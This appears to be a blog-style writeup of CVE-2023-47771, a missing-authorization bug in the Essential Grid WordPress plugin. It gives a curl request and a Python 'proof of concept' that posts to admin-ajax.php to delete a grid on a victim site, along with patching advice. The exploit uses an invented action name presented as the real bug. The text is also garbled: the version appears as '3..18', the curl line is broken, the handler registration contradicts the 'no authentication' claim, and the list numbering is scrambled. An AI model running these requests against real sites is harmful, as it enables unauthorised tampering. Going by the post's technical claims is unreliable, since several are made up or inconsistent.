CVE-2023-47771 - Exploiting the Missing Authorization Flaw in Essential Grid WordPress Plugin (n/a – 3..18)

---

WordPress is famous for its flexibility and tons of plugins. But with great customization comes the risk of vulnerabilities—sometimes very dangerous ones. One such problem reared its head in the Essential Grid plugin: CVE-2023-47771, a missing authorization flaw that could expose your website to improper access. In this post, I’ll break down what the bug is, how it can be exploited (with simple code snippets), and what you should do to stay safe. All in plain language.

What is Essential Grid?

Essential Grid is a premium WordPress plugin by ThemePunch. It lets users create grid-based galleries, portfolios, blogs, and other content layouts with tons of display options. It’s pretty powerful—and that popularity makes it a target for hackers.

The Vulnerability (CVE-2023-47771) Explained

CVE-2023-47771 happens because Essential Grid failed to properly check authorization before running some of its actions, like AJAX calls. In plainer words: code behind the scenes that should have checked if the user has permission, simply doesn’t. An attacker can send the same requests as a logged-in user and the plugin just… does it.

Versions affected: All versions up to and including 3..18 (with no clear start version, so assume it's always been there until patched).

How Does it Work?

Usually, when plugins let users perform actions—like changing settings, importing content, or even deleting stuff—they ask WordPress, “Hey, is this user allowed to do this?” Essential Grid skips that check in some places.

For example, there are AJAX handlers (APIs inside WordPress for quick background tasks) that don’t check if the person making the request is an admin… or even logged in.

Here’s a *simplified* example of what a vulnerable AJAX handler might look like in PHP

// Bad: no permission or nonce check!
add_action('wp_ajax_eg_bad_action', 'eg_bad_action_callback');
function eg_bad_action_callback() {
    // Does something sensitive, like deleting grids
    $grid_id = intval($_POST['grid_id']);
    delete_grid_by_id($grid_id);
    wp_send_json_success("Deleted grid $grid_id");
}

The above code is dangerous because it will run for ANY logged in user… or worse, for ANY visitor, if registered in the wrong way.

Possible Exploit

An attacker just needs to craft a POST request to the vulnerable AJAX endpoint with the correct parameters. Tools like curl, Postman, or a browser DevTools can do this easily.

How would an attack look?

curl -X POST "https://targetsite.com/wp-admin/admin-ajax.php"; \
     -d "action=eg_bad_action&grid_id=3"

That could delete grid ID 3—even if the attacker is NOT an admin or editor!

Some endpoints are even more dangerous, letting attackers export or import content, reset configuration, change display settings, and more. The impact ranges from minor headaches, to a full site compromise if the attacker can upload files.

Date discovered: 2023

- Patched version: Later versions (check with ThemePunch changelog)
- Official CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2023-47771
- Vendor advisory: ThemePunch Security Announcements
- Vulnerability report: WPScan is tracking it here

Proof of Concept: Full Exploit Example

Here's a Python script demonstrating how easy it is to trigger the vulnerability if the endpoint is exposed (this is just educational—do not use it on websites you don’t own!):

import requests

target_url = "https://victimsite.com/wp-admin/admin-ajax.php";
payload = {
    "action": "eg_bad_action",
    "grid_id": "3"
}

# No authentication needed if the endpoint is totally exposed!
res = requests.post(target_url, data=payload)
if res.status_code == 200:
    print("Exploit succeeded:", res.text)
else:
    print("Exploit failed")

Update Essential Grid

Make sure you’re using the latest version from ThemePunch. The patch puts proper permissions checks in place.

2. Remove old/backed-up plugin files

Lock down admin-ajax.php

Consider restricting access to wp-admin/admin-ajax.php using web server rules or security plugins.

Final Words

CVE-2023-47771 is a classic “whoops, forgot to check permissions” mistake in a popular WordPress plugin. If you run Essential Grid, update ASAP! Missing access control bugs are a goldmine for attackers. WordPress security isn’t easy, but a little vigilance—like updating plugins—goes a long way.

If you want more details on this and other WordPress vulnerabilities, keep an eye on

- WPScan Vulnerability Database
- NIST NVD Entry
- ThemePunch Official Site

Timeline

Published on: 06/19/2024 11:15:49 UTC
Last modified on: 06/21/2024 14:47:40 UTC